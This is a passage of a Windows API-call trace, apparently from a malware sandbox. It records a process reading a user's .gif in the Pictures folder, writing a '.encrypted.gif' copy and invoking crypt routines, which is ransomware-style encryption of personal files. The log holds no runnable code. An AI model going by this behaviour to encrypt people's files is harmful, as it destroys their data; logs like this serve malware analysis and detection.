RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0040.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0040.571] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.571] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.571] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0040.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0040.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0040.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.572] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\bbtymjaxu4vq024a.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.572] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.572] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0040.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0040.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0040.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0040.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0040.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0040.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.572] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0040.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0040.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0040.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0040.572] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0040.572] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0040.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0040.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0040.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0040.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0040.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0040.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0040.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0040.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0040.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0040.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0040.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0040.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0040.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0040.574] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci")) returned 0x10 [0040.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0040.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0040.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0040.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0040.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0040.574] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.encrypted.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\bbtymjaxu4vq024a.encrypted.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0040.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0040.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0040.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0040.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0040.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0040.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.575] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0040.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0040.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0040.575] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0040.575] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0040.575] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0040.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0040.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0040.576] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0040.576] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x86d1, lpOverlapped=0x0) returned 1 [0040.578] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0040.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0040.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x86d1) returned 0xac2018 [0040.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0040.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0040.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0040.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0040.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0040.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x86d1) returned 0xaca6f8 [0040.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.580] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0040.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x86d1) returned 0xac2018 [0040.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0040.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0040.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.580] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0040.580] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.580] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0040.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x86d1) returned 0xac2018 [0040.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0040.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0040.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0040.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc58 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0040.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x86d1) returned 0xad2dd8 [0040.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0040.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0040.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.582] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0040.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0040.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0040.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0040.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0040.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0040.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0040.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0040.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0040.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0040.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0040.582] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0040.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0040.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0040.583] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0040.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0040.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.583] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0040.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0040.583] RtlAllocateHeap 